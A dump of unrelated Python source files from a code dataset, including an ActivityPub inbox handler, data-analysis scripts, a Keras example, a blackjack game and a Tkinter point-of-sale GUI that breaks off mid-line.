count_tweets(infolderpath, outfolderpath)\n print(n, tr, nr)\n\n '''\n select_tweets()\n '''\n tweets2csv(inpath=\"/home/dicle/Documents/data/tr_twitter_raw25Apr/selected_tr_tweets\", \n outpath=\"/home/dicle/Documents/data/tr_twitter_raw25Apr/2100trtweets.csv\")\n '''\n \n \n","sub_path":"library/modules/dataset/twitter/twitter_raw_data.py","file_name":"twitter_raw_data.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22137007","text":"\"\"\"Handles requests for ActivityPub endpoints: actors, inbox, etc.\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport string\n\nimport appengine_config\n\nfrom granary import as2, microformats2\nimport mf2py\nimport mf2util\nfrom oauth_dropins.webutil import util\nimport webapp2\n\nimport common\nfrom models import Follower, MagicKey, Response\nfrom httpsig.requests_auth import HTTPSignatureAuth\n\nSUPPORTED_TYPES = (\n 'Accept',\n 'Announce',\n 'Article',\n 'Audio',\n 'Create',\n 'Follow',\n 'Image',\n 'Like',\n 'Note',\n 'Video',\n)\n\n\ndef send(activity, inbox_url, user_domain):\n \"\"\"Sends an ActivityPub request to an inbox.\n\n Args:\n activity: dict, AS2 activity\n inbox_url: string\n user_domain: string, domain of the bridgy fed user sending the request\n\n Returns:\n requests.Response\n \"\"\"\n logging.info('Sending AP request from %s: %s', user_domain,\n json.dumps(activity, indent=2))\n\n # prepare HTTP Signature (required by Mastodon)\n # https://w3c.github.io/activitypub/#authorization-lds\n # https://tools.ietf.org/html/draft-cavage-http-signatures-07\n # https://github.com/tootsuite/mastodon/issues/4906#issuecomment-328844846\n acct = 'acct:%s@%s' % (user_domain, user_domain)\n key = MagicKey.get_or_create(user_domain)\n auth = HTTPSignatureAuth(secret=key.private_pem(), key_id=acct,\n algorithm='rsa-sha256')\n\n # deliver to inbox\n headers = {\n 'Content-Type': common.CONTENT_TYPE_AS2,\n # required for HTTP Signature\n # https://tools.ietf.org/html/draft-cavage-http-signatures-07#section-2.1.3\n 'Date': datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT'),\n }\n return common.requests_post(inbox_url, json=activity, auth=auth, headers=headers)\n\n\nclass ActorHandler(webapp2.RequestHandler):\n \"\"\"Serves /[DOMAIN], fetches its mf2, converts to AS Actor, and serves it.\"\"\"\n\n def get(self, domain):\n url = 'http://%s/' % domain\n resp = common.requests_get(url)\n mf2 = mf2py.parse(resp.text, url=resp.url, img_with_alt=True)\n # logging.info('Parsed mf2 for %s: %s', resp.url, json.dumps(mf2, indent=2))\n\n hcard = mf2util.representative_hcard(mf2, resp.url)\n logging.info('Representative h-card: %s', json.dumps(hcard, indent=2))\n if not hcard:\n common.error(self, \"\"\"\\\nCouldn't find a \\\nrepresentative h-card on %s\"\"\" % resp.url)\n\n key = MagicKey.get_or_create(domain)\n obj = common.postprocess_as2(as2.from_as1(microformats2.json_to_object(hcard)),\n key=key)\n obj.update({\n 'inbox': '%s/%s/inbox' % (appengine_config.HOST_URL, domain),\n 'outbox': '%s/%s/outbox' % (appengine_config.HOST_URL, domain),\n })\n logging.info('Returning: %s', json.dumps(obj, indent=2))\n\n self.response.headers.update({\n 'Content-Type': common.CONTENT_TYPE_AS2,\n 'Access-Control-Allow-Origin': '*',\n })\n self.response.write(json.dumps(obj, indent=2))\n\n\nclass InboxHandler(webapp2.RequestHandler):\n \"\"\"Accepts POSTs to /[DOMAIN]/inbox and converts to outbound webmentions.\"\"\"\n\n def post(self, domain):\n logging.info('Got: %s', self.request.body)\n\n # parse and validate AS2 activity\n try:\n activity = json.loads(self.request.body)\n assert activity\n except (TypeError, ValueError, AssertionError):\n common.error(self, \"Couldn't parse body as JSON\", exc_info=True)\n\n obj = activity.get('object') or {}\n if isinstance(obj, basestring):\n obj = {'id': obj}\n\n type = activity.get('type')\n if type == 'Accept': # eg in response to a Follow\n return # noop\n if type == 'Create':\n type = obj.get('type')\n elif type not in SUPPORTED_TYPES:\n common.error(self, 'Sorry, %s activities are not supported yet.' % type,\n status=501)\n\n # TODO: verify signature if there is one\n\n # fetch actor if necessary so we have name, profile photo, etc\n for elem in obj, activity:\n actor = elem.get('actor')\n if actor and isinstance(actor, basestring):\n elem['actor'] = common.get_as2(actor).json()\n\n activity_unwrapped = common.redirect_unwrap(activity)\n if type == 'Follow':\n self.accept_follow(activity, activity_unwrapped)\n return\n\n # send webmentions to each target\n as1 = as2.to_as1(activity_unwrapped)\n common.send_webmentions(self, as1, proxy=True, protocol='activitypub',\n source_as2=json.dumps(activity_unwrapped))\n\n def accept_follow(self, follow, follow_unwrapped):\n \"\"\"Replies to an AP Follow request with an Accept request.\n\n Args:\n follow: dict, AP Follow activity\n follow_unwrapped: dict, same, except with redirect URLs unwrapped\n \"\"\"\n logging.info('Replying to Follow with Accept')\n\n followee = follow.get('object')\n followee_unwrapped = follow_unwrapped.get('object')\n follower = follow.get('actor')\n if not followee or not followee_unwrapped or not follower:\n common.error(self, 'Follow activity requires object and actor. Got: %s' % follow)\n\n inbox = follower.get('inbox')\n follower_id = follower.get('id')\n if not inbox or not follower_id:\n common.error(self, 'Follow actor requires id and inbox. Got: %s', follower)\n\n # store Follower\n user_domain = util.domain_from_link(followee_unwrapped)\n Follower.get_or_create(user_domain, follower_id, last_follow=json.dumps(follow))\n\n # send AP Accept\n accept = {\n '@context': 'https://www.w3.org/ns/activitystreams',\n 'id': util.tag_uri(appengine_config.HOST, 'accept/%s/%s' % (\n (user_domain, follow.get('id')))),\n 'type': 'Accept',\n 'actor': followee,\n 'object': {\n 'type': 'Follow',\n 'actor': follower_id,\n 'object': followee,\n }\n }\n resp = send(accept, inbox, user_domain)\n self.response.status_int = resp.status_code\n self.response.write(resp.text)\n\n # send webmention\n common.send_webmentions(\n self, as2.to_as1(follow), proxy=True, protocol='activitypub',\n source_as2=json.dumps(follow_unwrapped))\n\n\napp = webapp2.WSGIApplication([\n (r'/%s/?' % common.DOMAIN_RE, ActorHandler),\n (r'/%s/inbox' % common.DOMAIN_RE, InboxHandler),\n], debug=appengine_config.DEBUG)\n","sub_path":"activitypub.py","file_name":"activitypub.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"558322913","text":"from PyInquirer import Separator\n\n\"\"\" Welcome view question set \"\"\"\nquestions = [\n {\n # Framework Jumpstarter\n 'type': 'list',\n 'name': 'framework',\n 'message': '* Choose the framework to jumpstart |',\n 'choices': [\n {\n 'name': '.net'\n },\n {\n 'name': 'python'\n },\n {\n 'name': 'javascript'\n },\n {\n 'name': 'php'\n },\n ],\n },\n {\n # Project name\n 'type': 'input',\n 'name': 'project_name',\n 'message': f'* Name of project (myproject) |',\n 'default': 'myproject',\n },\n {\n # Project location\n 'type': 'input',\n 'name': 'location',\n 'message': '* Location of created project |'\n },\n {\n # Project in sub-folder [Y/N]\n 'type': 'confirm',\n 'name': 'is_sub_folder',\n 'message': 'Do you want your project in a sub-folder?',\n 'default': False\n },\n {\n # Additional project feature\n 'type': 'checkbox',\n 'name': 'additional_stuff',\n 'message': 'Select more stuff your want for your project',\n 'choices': [\n Separator('= General Stuff ='),\n {\n 'name': 'Item 1'\n },\n {\n 'name': 'Item 2'\n },\n {\n 'name': 'Item 3'\n },\n ]\n },\n]\n\n\n\"\"\" List of all application frameworks for jumpstarting \"\"\"\n\"\"\" Add optional frameworks here! \"\"\"\nframework_presets = [\n '.net',\n 'django',\n 'flask',\n 'c# (console)',\n 'c++ (console)',\n 'symfony',\n 'laravel',\n 'reactjs',\n 'vuejs',\n 'angularjs',\n 'backbonejs',\n 'aureliajs'\n 'python',\n]\n","sub_path":"framework_jumpstarter/utils/global_vars.py","file_name":"global_vars.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"443450662","text":"# Declaration of array.\n\narr = []\n\n# Taking input the total size of the array from the user.\n\nn = int(input(\"Enter size of the array : \"))\n\n# The function below takes input the numbers from the users as stdin.\n\nfor i in range(0,n):\n print(\"Enter element %d : \" %i+1)\n arr.append(int(input()))\n\nk = int(input(\"Enter the value you want to find : \"))\n\n# found is a boolean variable which tells whether the value we want to find \n# is present in the array or not.\n\nfound = False\n\nfor i in range(len(arr)):\n # If k is present in arr\n if(arr[i] == k):\n found = True\n print(\"%d found at %dth position : \" %(k,i+1))\n break\n# If k is not present in arr\nif(found == False):\n print(\"%d is not in the list.\" %k)","sub_path":"search-algos/linear_search/l_search.py","file_name":"l_search.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"428799790","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created on 2/22/17 6:25 PM\n# Project: topic_select\n# Author: PYZ\n\n\"\"\"\n该模块用于筛选优质主题\n\"\"\"\nfrom math import log\nfrom sys import argv\n\nimport pandas as pd\n\nfrom utils.file_util import save_line_file\n\ntopic_word_path = '/mnt/data/topics_{}.csv'\n\n\ndef entropy(path, k):\n \"\"\"计算一个主题的熵\"\"\"\n src_csv = pd.read_csv(path)\n tar_csv_path = '/mnt/data/topic_entropy_{}.csv'.format(k)\n ret = ['topicid,topic_entropy']\n for topic_id in src_csv.topicid.unique():\n topic_entropy = sum(map(lambda x: x * log(x), list(src_csv[src_csv.topicid == topic_id].topic_word_score))) * -1\n ret.append('%d,%f' % (topic_id, topic_entropy))\n save_line_file(ret, tar_csv_path, 'w')\n\n\ndef main():\n k = argv[0]\n entropy(topic_word_path.format(k), k)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"calculate/topic_select.py","file_name":"topic_select.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364716092","text":"from ums.views import admin_dashboard, close_ticket\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n\n path('usr/home', views.user_homepage, name=\"user_homepage\"),\n path('usr/patients', views.all_patients, name='all_patients'),\n path('usr/stats', views.stats, name='stats'),\n path('usr/patients/', views.single_patient, name='single_patient'),\n path('usr/patients/del/', views.delete_patient_record, name='delete_record'),\n\n path('usr/charts/city/pie',views.get_chart_pie_data),\n path('usr/charts/date/line',views.get_chart_line_data),\n\n\n\n]\n","sub_path":"ims/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"44832777","text":"from random import shuffle\nclass Card:\n def __init__(self,rank,suit):\n self.rank=rank\n self.suit=suit\n \n def card_value(self):\n if self.rank in \"TJQK\":\n return 10\n elif self.rank in \"A\": #переделали значение туза\n return 11\n else:\n return \" 23456789\".index(self.rank)\n \n def get_rank(self):\n return self.rank\n def __str__(self):\n return \"%s%s\"%(self.rank,self.suit)\n \nclass Hand:\n def __init__(self,name):\n self.name=name\n self.cards=[]\n \n def add_card(self,card):\n self.cards.append(card)\n \n def get_value(self):\n result=0\n aces=0\n for card in self.cards:\n result +=card.card_value()\n #if card.get_rank()==\"A\": \\\\сдесь значение туза не изменяется,\n #aces += 11 h\\\\ не знаю почему.\n if result + aces*10 <=21:\n result +=aces*10\n return result\n \n def __str__(self):\n text = \"%s's contains:\\n \" %self.name\n for card in self.cards:\n text +=str(card)+\" \"\n text +=\"\\nHand value: \"+str(self.get_value())\n return text\n \nclass Deck:\n def __init__(self):\n ranks = \"23456789TJQKA\"\n suits = \"DCHS\"\n self.cards = [Card(r,s) for r in ranks for s in suits]\n shuffle(self.cards)\n \n def deal_card(self):\n return self.cards.pop()\n def new_game():\n d = Deck()\n player_hand = Hand(\"Player\")\n dealer_hand = Hand(\"Dealer\")\n player_hand.add_card(d.deal_card())\n player_hand.add_card(d.deal_card())\n dealer_hand.add_card(d.deal_card())\n print (dealer_hand)\n print(\"=\"*20)\n print(player_hand)\n in_game=True\n while player_hand.get_value()<21:\n ans=input(\"Hit or stand? (h/s)\")\n if ans ==\"h\":\n player_hand.add_card(d.deal_card())\n print(player_hand)\n if player_hand.get_value()>21:\n print(\"You lose\")\n in_game = False\n elif ans == \"s\":\n print(\"You stand\")\n break\n print(\"=\"*20)\n if in_game:\n while dealer_hand.get_value()<17:\n dealer_hand.add_card(d.deal_card())\n print(dealer_hand)\n if dealer_hand.get_value()>21:\n print(\"Dealer bust\")\n in_game=False\n if in_game:\n if player_hand.get_value()>dealer_hand.get_value():\n print(\"You win\")\n else:\n print(\"Dealer win\")\n if __name__==\"__main__\":\n new_game()\nif __name__==\"__main__\":\n Deck()","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"316029016","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as scs\nimport statsmodels.tsa.api as smt\nimport statsmodels.api as sm\nimport tsa.ts_modelling as tsm\n\n\ndef plotSample( x, log=False, lags=None, figSize=( 10, 8 ), figStyle= 'bmh', alpha= 0.5, **kwargs ):\n \"\"\"\n Convenience function to plot given sample and analyze serial correlation visually.\n\n :param x: array_like\n Array of sample values\n :param log: boolean\n Controls whether this function plots logarithmic returns of the given sample x, or original sample.\n :param lags: array_like, optional\n Array of lag values, used on horizontal axis.\n If not given, ``lags=np.arange(len(corr))`` is used.\n :param figSize: Size\n :param figStyle: Style\n :param alpha: scalar, optional\n If a number is given, the confidence intervals for the given level are\n returned. For instance if alpha=.05, 95 % confidence intervals are\n returned where the standard deviation is computed according to\n Bartlett's formula. If None, no confidence intervals are plotted.\n :param **kwargs: kwargs, optional\n Optional keyword arguments that are directly passed on to the\n Matplotlib ``plot`` and ``axhline`` functions.\n :return:\n Matplotlib figure instance\n \"\"\"\n if not isinstance( x, pd.Series ):\n x = pd.Series( x )\n\n figLayout = ( 4, 2 ) if log else ( 3, 2 )\n\n with plt.style.context( figStyle ):\n plt.figure( figsize=figSize )\n # Specify initial layout position\n figYCoord = 0\n axTS = plt.subplot2grid( figLayout, ( figYCoord, 0 ), colspan=2 )\n axTS.set_title( 'Time Series Analysis Plots' )\n x.plot( ax=axTS )\n\n if log:\n figYCoord += 1\n axTSL = plt.subplot2grid( figLayout, ( figYCoord, 0 ), colspan=2 )\n axTSL.set_title( 'Log Returns' )\n # Calculate logarithmic returns sample, using original sample\n # and replace original sample with calculated results\n x = tsm.applyLog( x )\n x.plot( ax=axTSL )\n\n figYCoord += 1\n axACF = plt.subplot2grid( figLayout, ( figYCoord, 0 ) )\n axPACF = plt.subplot2grid( figLayout, ( figYCoord, 1 ) )\n smt.graphics.plot_acf( x, lags=lags, ax=axACF, alpha=alpha )\n smt.graphics.plot_pacf( x, lags=lags, ax=axPACF, alpha=alpha )\n\n figYCoord += 1\n axQQ = plt.subplot2grid( figLayout, ( figYCoord, 0 ) )\n axQQ.set_title( 'QQ Plot' )\n axPP = plt.subplot2grid( figLayout, ( figYCoord, 1 ) )\n sm.qqplot( x, line='s', ax=axQQ )\n scs.probplot( x, sparams=( x.mean(), x.std() ), plot=axPP )\n\n plt.tight_layout()\n plt.show()\n return\n\n","sub_path":"tsa/ts_plot.py","file_name":"ts_plot.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"525903012","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reviews', '0002_auto_20161118_1317'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='reviews',\n name='preview_text',\n field=models.CharField(max_length=10000, verbose_name='Текс превью отзыва', help_text='Введите текст', blank=True),\n ),\n ]\n","sub_path":"reviews/migrations/0003_reviews_preview_text.py","file_name":"0003_reviews_preview_text.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650450567","text":"from exif import Image\nimport os\nimport matplotlib.pyplot as plt\n\nlens = []\ng5x = []\nslr = []\n\ndirectory = '/Users/mack/Pictures/2020' # Directory to search, will search recursively\n\nfor root, subdirs, files in os.walk(directory):\n files = [ fi for fi in files if fi.endswith(\".JPG\") ]\n for fi in files:\n f = open(root+'/'+fi, 'rb')\n pic = Image(f)\n \n crop_factor = (1.415/(pic.pixel_x_dimension / pic.focal_plane_x_resolution))\n lens.append(pic.focal_length*crop_factor)\n if crop_factor > 2: # G5x has ~2.7x crop factor\n g5x.append(pic.focal_length*crop_factor)\n else:\n slr.append(pic.focal_length*crop_factor)\n\nplt.hist(lens, 100)\nplt.show()\n","sub_path":"focal_lengths.py","file_name":"focal_lengths.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"239719043","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('omfgallery', '0003_auto_20151215_1712'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='album',\n name='album_type',\n field=models.CharField(max_length=2, default='MP', choices=[('V', 'Videos'), ('MV', 'Making videos'), ('MP', 'Making Photos')]),\n ),\n ]\n","sub_path":"onemoreframe/omfgallery/migrations/0004_album_album_type.py","file_name":"0004_album_album_type.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"601229178","text":"# validation_split 사용\r\n\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nimport numpy as np\r\nfrom numpy import array\r\n\r\n#1. 데이터\r\nx = np.array(range(1, 101))\r\n# x2 = array(range(1, 101))\r\n# 같은 데이터임.\r\ny = array(range(101,201))\r\n\r\n#인덱스임.\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(\r\n x, y, train_size=0.8, test_size=0.2 #, shuffle=True\r\n ) \r\n# x_test, x_val, y_test, y_val = train_test_split(\r\n# x_test, y_test, train_size = 0.5)\r\n\r\n#shuffle false 로 해주면 순서대로 나옴. . \r\n# 디폴트값은 True(랜덤)\r\n#print(x_test.shape)\r\n#print(x_train.shape)\r\n\r\n# 캐글 50~100, 데이톤 문제 ~20, 해커톤 등... 문제 많이 풀어보자.\r\n\r\n'''\r\nx_train = x[:60] # 0번부터 59번까지 60개의 데이터 잘라오기\r\nx_val = x[60:80] # 60부터 79까지 총 20개\r\nx_test = x[80:] # 80부터 100 까지 총 20개\r\n\r\ny_train = y[:60] # 0번부터 59번까지 60개의 데이터 잘라오기\r\ny_val = y[60:80] # 60부터 79까지 총 20개\r\ny_test = y[80:] # 80부터 100 까지 총 20개\r\n'''\r\n#2\r\nmodel = Sequential()\r\nmodel.add(Dense(20, input_dim = 1, activation = 'relu'))\r\nmodel.add(Dense(30))\r\nmodel.add(Dense(40))\r\nmodel.add(Dense(20))\r\nmodel.add(Dense(1))\r\n\r\n#3.\r\nmodel.compile(loss = 'mse', optimizer = 'adam')\r\nmodel.fit(x_train, y_train, epochs = 300, batch_size = 1, \r\n validation_split = 0.2)\r\n\r\n#4.\r\nloss = model.evaluate(x_test, y_test, batch_size = 1)\r\nprint('loss = ', loss)\r\n\r\nresult = model.predict([101, 102, 103])\r\nprint('result = ', result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"tensorflow/keras/keras05.split3.py","file_name":"keras05.split3.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"363606945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 25 14:24:33 2018\n\n@author: krishna\n\"\"\"\nimport copy\n#f = open(\"data_gyroscope.csv\",\"r\")\n#f = open(\"data_accelerometer.csv\",\"r\")\nf = open(\"outputTemp1.csv\",\"r\")\nMf = 0\nSf = 0\ndataMatrix = []\n\nfor line in f:\n temp = line.split(',')\n dataMatrix.append(temp)\n \nzScoreMatrix = copy.deepcopy(dataMatrix)\nfor indC in range(len(dataMatrix[0])-1):\n SUM = 0\n for indR in range(1,len(dataMatrix)):\n SUM += float(dataMatrix[indR][indC])\n Mf = float(SUM/(len(dataMatrix)-1))\n SUM = 0\n for indR in range(1,len(dataMatrix)):\n SUM+=abs(float(dataMatrix[indR][indC])-Mf)\n Sf = float(SUM/(len(dataMatrix)-1))\n for indR in range(1,len(dataMatrix)):\n zScoreMatrix[indR][indC] = str(float((float(dataMatrix[indR][indC])-float(Mf))/float(Sf)))\n \n#f1 = open(\"zData_accelerometer.csv\",\"w\")\n#f1 = open(\"zData_gyroscope.csv\",\"w\")\nf1 = open(\"zData.csv\",\"w\")\nfor x in zScoreMatrix:\n temp1 = \",\".join(x)\n f1.write(temp1)\nf.close()\nf1.close()\n \n ","sub_path":"Codes/zScore.py","file_name":"zScore.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"88910710","text":"\ndef equilibriumPoint(arr, n):\n for i in range(n):\n leftsum = 0\n rightsum = 0\n for j in range(i):\n leftsum += arr[j]\n for j in range(i + 1, n):\n rightsum += arr[j]\n if leftsum == rightsum:\n return i + 1\n return -1\n\n\ndef validate_equilibrium_inputs(array, n):\n if n < 0 or n > len(array):\n raise Exception('Please add a validate N value')\n for a in array:\n if isinstance(a, int):\n if a < 0:\n raise Exception('value cannot be negative')\n else:\n raise Exception('value can only be integers')\n\n\ndef inputs():\n print('\\033[93m' + \"Please add space while entering numbers of array i.e 1 2 3 4 5\" + '\\033[0m')\n print('\\033[93m' + \"Only add positive number\" + '\\033[0m')\n array = list(map(int, input(\"\\nEnter the array : \").strip().split()))\n _n = int(input(\"Enter numbers of N : \"))\n validate_equilibrium_inputs(array, _n)\n return equilibriumPoint(array, _n)\n\n\nprint(inputs())","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"292407561","text":"import tkinter\nfrom tkinter import ttk\n#from backend import *\nfrom database import *\nfrom kortTerminal import *\n\nitems = [\"Ienhet\", \"Dndpfsd\", \"Nflpwnf\"]\ndb = Database()\nkortbetaling = KortBetaling()\n\n\nrodListe = [\"Funksjoner\", \"Tilbake\", \"Tilbake\", \"Tilbake\"]\ngronnListe = [\"Endre antall\", \"Artikkel\", \"Kort\", \"Linjeretur\"]\ngulListe = [\"Søk artikkel\", \"Flere funksjoner\", \"Kontanter\", \"\"]\nblaListe = [\"Prisforespørsel\", \"Linjerabatt\", \"Rabatter\", \"\"]\norangeListe = [\"Fjern artikkel\", \"E-tjenester\", \"Andre betalingsmåter\", \"\"]\nlillaListe = [\"Lojalitet\", \"Kvitteringsfunksjoner\", \"\", \"\"]\nhvitListe = [\"Betaling\", \"Velikehold\", \"\", \"\"]\n\n\n\nclass GuiKasse:\n def __init__(self, userId=0):\n print(userId, \"s6k\")\n self.hovedvindu = tkinter.Tk()\n self.hovedvindu.title(\"Kassesystem\")\n #self.hovedvindu.attributes('-fullscreen', True) # FULLSCREEN\n self.hovedvindu.geometry(\"\")\n\n self.HEIGHT = self.hovedvindu.winfo_screenwidth()\n\n\n \n\n # Frames\n\n #Widgets\n self.showItemsFrame = tkinter.Frame(self.hovedvindu, background=\"#111\")\n self.showItemsFrame.grid(column=0, row=0, columnspan=1)\n\n self.angiFrame = tkinter.Frame(self.hovedvindu)\n self.angiFrame.grid(column=0, row=1, sticky=\"W\")\n\n self.funcFrame = tkinter.Frame(self.hovedvindu, background=\"#31B4D8\")\n self.funcFrame.grid(column=2, row=0, rowspan=3) # , sticky=\"e\")\n\n self.keysFrame = tkinter.Frame(self.hovedvindu)\n self.keysFrame.grid(column=0, row=2)\n\n self.footerFrame = tkinter.Frame(self.hovedvindu, background=\"red\")\n self.footerFrame.grid(column=0, row=3, sticky=\"WE\", columnspan=3)\n\n\n #Widget TREEVIEW\n self.display_treeview = ttk.Treeview(self.showItemsFrame, selectmode=tkinter.BROWSE, show=\"tree\", column=('artikelNr', 'article', 'price'), height=10)\n\n #Variabler\n self.state = 0\n self.artiklerIKurv = []\n self.antallLinjer = 0\n self.treeviewID = 0\n self.treeListLen = 0\n self.currentScollPOS = -1\n\n #Stringvar\n self.sumStringvar = tkinter.StringVar()\n self.sumStringvar.set(\"\")\n\n self.antallArtikler_stringvar = tkinter.StringVar()\n self.antallArtikler_stringvar.set(\"\")\n\n #EVENTS\n self.hovedvindu.bind('', self.enterKEY_Funk)\n self.display_treeview.bind('', self.selectFromTree_func)\n\n #Bulding the GUI: \n self.treeview()\n self.angifelt()\n self.funcfelt()\n self.numfelt()\n self.footer()\n\n #MAINLOOP\n tkinter.mainloop()\n\n #Building functions\n\n def treeview(self):\n style = ttk.Style()\n style.configure(\"Treeview\", font=(\"Arial\", 14), rowheight=25)\n #self.display_treeview = ttk.Treeview(self.showItemsFrame, show=\"tree\", column=('artikelNr', 'article', 'price'))\n self.display_treeview.heading('#1', text=\"artikelNr\", anchor=tkinter.CENTER)\n self.display_treeview.heading('#2', text=\"article\", anchor=tkinter.CENTER)\n self.display_treeview.heading('#3', text=\"price\", anchor=tkinter.CENTER)\n\n self.display_treeview.column('#0', minwidth=0, width=0)\n self.display_treeview.column('#1', minwidth=0, width=150, anchor=tkinter.W)\n self.display_treeview.column('#2', minwidth=0, width=250, anchor=tkinter.W)\n self.display_treeview.column('#3', minwidth=0, width=160, anchor=tkinter.W)\n\n self.display_treeview.grid(column=0, row=0, columnspan=2)\n\n #self.display_treeview.insert(\"\", \"end\", value=('70-8001', 'Bærepose S', '1.00'))\n #self.display_treeview.insert(\"\", \"end\", value=('70-8001', 'Bærepose S', '1.00'))\n\n #self.scrollUP_button = tkinter.Button(self.showItemsFrame, text=\"^\", command=self.selectFromTree_func).grid(column=1, row=0)\n #self.scrollDOWN_button = tkinter.Button(self.showItemsFrame, text=\"v\", command=self.selectFromTree_func).grid(column=1, row=1)\n\n self.antallArtikler = tkinter.Label(self.showItemsFrame, textvariable=self.antallArtikler_stringvar, fg=\"#fff\", bg=\"#111\", font=(\"Arial\", 14))\n self.antallArtikler.grid(column=0, row=1, sticky=\"NW\")\n\n self.sumLabel = tkinter.Label(self.showItemsFrame, textvariable=self.sumStringvar, fg=\"#fff\", bg=\"#111\", font=(\"Arial\", 14))\n self.sumLabel.grid(column=1, row=1, sticky=\"NWE\")\n \n #self.scroll_canvas = tkinter.Canvas(self.scrollFrame, background=\"#111\", width=10)\n #self.scroll_canvas.grid(column=0, row=0)\n \n #self.scroll_canvas.create_oval(2, 2, 2, 2)\n\n #self.scrollUP_button = tkinter.Button(self.scrollFrame, text=\"^\", command=self.selectFromTree_func).grid(column=0, row=0, pady=5, padx=(0, 10))\n #self.scrollDOWN_button = tkinter.Button(self.scrollFrame, text=\"v\", command=self.selectFromTree_func).grid(column=0, row=1, pady=2)\n\n def angifelt(self):\n #Widgets:\n self.label = tkinter.Label(self.angiFrame, text=\"Angi/skann artikkel:\", font=(\"Arial\", 14))\n self.entry = tkinter.Entry(self.angiFrame, width=50, font=(\"Arial\", 14))\n \n #Placement\n self.label.grid(column=0, row=0, sticky=\"NW\", pady=0, padx=20)\n self.entry.grid(column=0, row=1, sticky=\"NW\", pady=0, padx=20)\n\n\n def funcfelt(self):\n x_margin = 10\n y_margin = 5\n x_padding = 100\n y_padding = 25-5\n borderWidth = 5\n\n\n self.rodStringvar = tkinter.StringVar()\n self.rodStringvar.set(\"F1\\n\" + rodListe[self.state])\n\n self.gronnStringvar = tkinter.StringVar()\n self.gronnStringvar.set(\"F2\\n\" + gronnListe[self.state])\n\n self.gulStringvar = tkinter.StringVar()\n self.gulStringvar.set(\"F3\\n\" + gulListe[self.state])\n\n self.blaStringvar = tkinter.StringVar()\n self.blaStringvar.set(\"F4\\n\" + blaListe[self.state])\n\n self.orangeStringvar = tkinter.StringVar()\n self.orangeStringvar.set(\"F5\\n\" + orangeListe[self.state])\n\n self.lillaStringvar = tkinter.StringVar()\n self.lillaStringvar.set(\"F6\\n\" + lillaListe[self.state])\n\n self.hvitStringvar = tkinter.StringVar()\n self.hvitStringvar.set(\"F7\\n\" + hvitListe[self.state])\n\n #Widgets\n self.funksjonButton = tkinter.Button(self.funcFrame, textvariable=self.rodStringvar, width=2, command=self.rodFunk, background=\"#EB4521\", borderwidth=borderWidth)\n self.endre_antallButton = tkinter.Button(self.funcFrame, textvariable=self.gronnStringvar, width=2, command=self.gjorIngenting, background=\"green\", borderwidth=borderWidth)\n self.sok_artikkelButton = tkinter.Button(self.funcFrame, textvariable=self.gulStringvar, width=2, command=self.gulFunk, background=\"#EEF422\", borderwidth=borderWidth)\n self.prisforesporselButton = tkinter.Button(self.funcFrame, textvariable=self.blaStringvar, width=2, command=self.gjorIngenting, background=\"#00BFF3\", borderwidth=borderWidth)\n self.fjern_artikkelButton = tkinter.Button(self.funcFrame, textvariable=self.orangeStringvar, width=2, command=self.gjorIngenting, background=\"orange\", borderwidth=borderWidth)\n self.lojalitetButton = tkinter.Button(self.funcFrame, textvariable=self.lillaStringvar, width=2, command=self.gjorIngenting, background=\"#B135D0\", borderwidth=borderWidth)\n self.velikeholdButton = tkinter.Button(self.funcFrame, 